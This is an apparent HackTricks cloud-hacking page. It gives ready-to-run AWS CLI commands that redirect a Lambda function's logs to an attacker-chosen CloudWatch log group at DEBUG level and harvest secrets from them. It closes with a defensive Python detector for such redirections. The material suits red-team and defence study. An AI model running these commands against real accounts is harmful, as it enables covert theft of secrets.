AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse the advanced logging controls of lambda:UpdateFunctionConfiguration to redirect a function's logs to a CloudWatch Logs log group chosen by the attacker. This works without changing the code or the execution role (most Lambda roles already include logs:CreateLogGroup/CreateLogStream/PutLogEvents via AWSLambdaBasicExecutionRole). If the function prints secrets/request bodies or crashes with stack traces, you can collect them from the new log group.
Required permissions
- lambda:UpdateFunctionConfiguration
- lambda:GetFunctionConfiguration
- lambda:InvokeFunction (or rely on existing triggers)
- logs:CreateLogGroup (often not needed if the function's role already has it)
- logs:FilterLogEvents (to read the events)
Steps
- Create the sink log group
aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
- Redirect the target function's logs
aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1
Wait until LastUpdateStatus is Successful:
aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text
- Invoke and read from the sink
aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
Impact
- Silently redirect all application/system logs to a log group you control, defeating the expectation that logs only land in /aws/lambda/<fn>.
- Exfiltrate sensitive data printed by the function or surfaced in errors.
Cleanup
aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
--region us-east-1 || true
Notes
- Logging controls are part of Lambda's LoggingConfig (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel).
- By default Lambda sends logs to /aws/lambda/<function>, but you can point them at any log group name; Lambda (or the execution role) will create it if permitted.
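From the defender's side, the two things worth checking are the current state (which functions have a LoggingConfig.LogGroup that differs from the conventional /aws/lambda/<function>) and the change event (an UpdateFunctionConfiguration call that set loggingConfig.logGroup elsewhere). The script below is an added example, not part of the original page or of any AWS tooling: it runs both checks over constructed sample data shaped like `aws lambda get-function-configuration` output and CloudTrail records. The CloudTrail field names (`requestParameters.loggingConfig.logGroup`, the versioned event name `UpdateFunctionConfiguration20150331v2`) are assumptions about the record shape; in a real pipeline you would feed it `list-functions` output and CloudTrail Lake or S3 trail exports.

```python
"""Detect Lambda log redirection via LoggingConfig.LogGroup.

Added example (not from the original page). Two checks:
  1. audit_function_configs(): flag functions whose LoggingConfig.LogGroup
     is not /aws/lambda/<FunctionName>.
  2. audit_cloudtrail_events(): flag UpdateFunctionConfiguration CloudTrail
     records whose loggingConfig.logGroup points at a non-default group.
All input below is constructed sample data, not real account output.
"""
from typing import Any, Dict, Iterable, List

DEFAULT_PREFIX = "/aws/lambda/"


def expected_log_group(function_name: str) -> str:
    """Lambda's default log group for a function."""
    return f"{DEFAULT_PREFIX}{function_name}"


def audit_function_configs(configs: Iterable[Dict[str, Any]]) -> List[Dict[str, str]]:
    """Return one finding per function whose logs are redirected.

    `configs` mirror get-function-configuration / list-functions output.
    A missing LoggingConfig or LogGroup means the default group is in use.
    """
    findings: List[Dict[str, str]] = []
    for cfg in configs:
        name = cfg["FunctionName"]
        logging_cfg = cfg.get("LoggingConfig") or {}
        group = logging_cfg.get("LogGroup") or expected_log_group(name)
        if group != expected_log_group(name):
            findings.append({
                "FunctionName": name,
                "LogGroup": group,
                # DEBUG level widens what ends up in the attacker's sink
                "ApplicationLogLevel": logging_cfg.get("ApplicationLogLevel", "INFO"),
            })
    return findings


def audit_cloudtrail_events(events: Iterable[Dict[str, Any]]) -> List[Dict[str, str]]:
    """Flag UpdateFunctionConfiguration calls that move logs off the default group.

    Field naming (camelCase requestParameters, versioned eventName) is an
    assumption about the CloudTrail record shape.
    """
    findings: List[Dict[str, str]] = []
    for ev in events:
        if ev.get("eventSource") != "lambda.amazonaws.com":
            continue
        if not str(ev.get("eventName", "")).startswith("UpdateFunctionConfiguration"):
            continue
        params = ev.get("requestParameters") or {}
        group = (params.get("loggingConfig") or {}).get("logGroup")
        if not group:
            continue  # the call did not touch the log group
        name = params.get("functionName", "")
        if group != expected_log_group(name):
            findings.append({
                "FunctionName": name,
                "LogGroup": group,
                "Principal": (ev.get("userIdentity") or {}).get("arn", "<unknown>"),
                "EventTime": ev.get("eventTime", ""),
            })
    return findings


# Constructed samples: one redirected function, one explicit default, one untouched.
SAMPLE_CONFIGS = [
    {"FunctionName": "billing-api", "LoggingConfig": {"LogFormat": "Text"}},
    {"FunctionName": "orders-worker", "LoggingConfig": {
        "LogFormat": "JSON", "LogGroup": "/aws/hacktricks/ht-log-sink",
        "ApplicationLogLevel": "DEBUG"}},
    {"FunctionName": "legacy-fn"},
]

SAMPLE_EVENTS = [
    {"eventSource": "lambda.amazonaws.com", "eventName": "UpdateFunctionConfiguration20150331v2",
     "eventTime": "2024-01-01T10:00:00Z", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"functionName": "billing-api", "memorySize": 512}},
    {"eventSource": "lambda.amazonaws.com", "eventName": "UpdateFunctionConfiguration20150331v2",
     "eventTime": "2024-01-01T10:05:00Z", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"functionName": "orders-worker", "loggingConfig": {
         "logGroup": "/aws/hacktricks/ht-log-sink", "logFormat": "JSON", "applicationLogLevel": "DEBUG"}}},
    {"eventSource": "lambda.amazonaws.com", "eventName": "UpdateFunctionConfiguration20150331v2",
     "eventTime": "2024-01-01T10:10:00Z", "userIdentity": {"arn": "arn:aws:iam::111111111111:role/deploy"},
     "requestParameters": {"functionName": "legacy-fn", "loggingConfig": {
         "logGroup": "/aws/lambda/legacy-fn", "logFormat": "Text"}}},
]

if __name__ == "__main__":
    for f in audit_function_configs(SAMPLE_CONFIGS):
        print("REDIRECTED:", f)
    for f in audit_cloudtrail_events(SAMPLE_EVENTS):
        print("SUSPICIOUS UPDATE:", f)
```

Running it reports orders-worker as redirected and the contractor's update as the change that did it, while the memory-only update and the explicit default-group update are ignored. A CloudWatch Logs subscription or EventBridge rule on UpdateFunctionConfiguration events is the natural place to run the second check continuously; the first check is a periodic inventory sweep.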